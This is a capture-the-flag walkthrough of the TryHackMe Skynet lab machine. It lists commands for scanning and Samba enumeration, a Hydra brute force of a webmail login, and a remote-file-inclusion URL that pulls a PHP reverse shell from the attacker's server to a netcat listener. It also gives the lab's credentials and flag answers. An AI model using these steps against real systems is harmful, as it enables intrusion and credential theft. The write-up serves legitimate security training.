TryHackMe Skynet is a vulnerable Terminator themed Linux machine created to test our penetration testing knowledge in network scanning, enumeration, attack samba share, RFI attacks and privilege escalation.
Start the Machine
Before everything we need to start our machine and wait around a minute to start our recon phase. After the machine is up and running it’s time to scan the box.
Scan the Target Machine
To scan our machine I will use Nmap with a few arguments to detect the service versions on all ports.
nmap -sV -sC -A -p- 10.10.131.16Analyse Nmap Scan results
After running the nmap scan I notice a few open ports and four main services – SSH , Apache, Dovecot, Samba.
- 22/tcp SSH
- 80/tcp HTTP
- 110/tcp POP3
- 139/tcp NetBIOS Samba
- 143/tcp IMAP
- 445/tcp NetBIOS Samba
Investigate Port 80 Apache/2.4.18
Open you browser with your Skynet Box IP and a skynet dummy search engine appear
I have tried search something but nothing happen. Analyzing the HTML code I can’t find nothing relevant!
At this point we get nothing from the Webserver it’s time to search some folders and find something useful to explore.
Execute gobuster
To find new folders on the webserver I will use gobuster with a public list.
gobuster dir -u http://10.10.131.16 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
After running the gobuster we got some useful folders to investigate but only one can be open, the squirrelmail folder!
Info to Explore
- folder squirrelmail
Investigate Dovecot
Open the browser and access the squirrelmail folder it will open a login page and show us the SquirrelMail version 1.4.23
http://10.10.131.16/squirrelmail
At this point we have the version of squirrel service and a login page but no clue of any username or email I’ve try some basic SQLi but without success. It’s time try the next service available Samba.
Investigate Samba
To investigate the Samba service I usually use the SMBMap tool or Nmap.
smbmap -H 10.10.131.16
After executing smbmap we got some juicy info, we can Read the anonymous share and there is a interesting share with the name milesdyson but we don’t have access to it.
Wait? milesdyson sound like a username for me, maybe can be used on Squirrelmail login page. keep it in mind for now I will investigate the anonymous share maybe I can find some useful file.
Connect to anonymous Share
For now let’s connect to the anonymous share with SMBClient using the command:
smbclient //10.10.131.16/anonymousWe are in let’s list the files available and search…
We have one file and one folder to investigate.
cat attention.txt
We can confirm our suspects the user Miles Dyson exists.
Log1.txt file looks like a password list file and maybe can be used as a wordlist to bruteforce the squirrelemail login page, let’s try it.
Brute force Squirrel login with Hydra
Here we will test the milesdyson as username a log1.txt file as a wordlist.
hydra -l milesdyson -P log1.txt 10.10.131.16 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Something is incorrect." -V -F -u
After a successful brute force attack against squirrel we can login with user milesdyson and password cyborg007haloterminator
Open first email and extract Samba password
Connect to milesdyson Share
smbclient //10.10.131.16/milesdyson -U milesdyson
Insert the Password-> )s{A&2Z=F^n_E.B`
Only PDF files and a folder called notes let’s list it
One file looks interesting important.txt
The important.txt file mention some new directory /45kra24zxs28v3yd open it and we have the Miles Dyson homepage.
gobuster o find this administrator page
gobuster dir -u http://10.10.131.16/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
Open http://10.10.131.16/45kra24zxs28v3yd/administrator
Cuppa CMS Exploit
Find some useful exploit to run on Cuppa CMS
searchsploit cuppa
Select Reverse Shell
Here I will copy the PHP Reverse Shell into my homefolder and then start a python webserver to
cp /usr/share/webshells/php/php-reverse-shell.php ~
Change the webshell values IP and Port if needed.
cd /home/userpython3 -m http.server 801http://10.10.131.16/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.153.122:801/php-reverse-shell.phpOpen a new terminal and use netcat or metasploit o listen on port 1234
nc -l 1234cd milesdyson
cat user.txt
Our session is limited to the user webserver is running www-data, we need to find a way to elevate privileges but before that let’s brute force the Samba share milesdyson.
Brute Force Samba Service
hydra -l milesdyson -P log1.txt 10.10.131.16 smb -VNo success brute forcing the milesdyson share, OK let’s be more intrusive.
Privilege Escalation
Using Exploit
Search exploit to out kernel version
searchsploit kernel 4.8.0
Using Crontab
Root Flag
cat /root/root.txtAnswer Questions
Now its time to answer the CTF questions
What is Miles password for his emails?
cyborg007haloterminatorWhat is the hidden directory?
/45kra24zxs28v3ydWhat is the vulnerability called when you can include a remote file for malicious purposes?
remote file inclusion
What is the user flag?
7ce5c2109a40f958099283600a9aeXXXWhat is the root flag?
3f0372db24753accc7179a282cd6aXXX